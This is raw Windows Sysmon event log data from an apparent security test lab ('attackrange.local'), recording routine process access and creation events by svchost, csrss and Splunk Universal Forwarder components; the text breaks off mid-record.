16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245641Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245640Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245639Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51A6-6063-AD22-00000000AF01}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245638Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51A6-6063-AD22-00000000AF01}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245637Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.879{CB4067E1-51A6-6063-AD22-00000000AF01}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245636Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.316{CB4067E1-51A6-6063-AC22-00000000AF01}3588556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245635Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51A6-6063-AC22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245634Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245633Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245632Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245631Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245630Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245629Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245628Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245627Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245626Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245625Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-51A6-6063-AC22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245624Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51A6-6063-AC22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245623Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.209{CB4067E1-51A6-6063-AC22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245622Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F62DC442554DC89EDA47E49BEC82633,SHA256=712899A99B474A80B47F19DFBB56F4167720FC906B5B2113C53A62CFF942B10A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245621Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.206{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CB56570F22A9057EE642488B2BA0BC4,SHA256=8349236979B69EDBCD7278CF666C324DC6B7529A651C0E1D7AAC401BF385877F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060948Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.929{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51A7-6063-1C01-00000000AF01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060947Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.929{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060946Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.929{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060945Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.929{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060944Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.929{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060943Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.929{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-51A7-6063-1C01-00000000AF01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060942Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.929{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51A7-6063-1C01-00000000AF01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 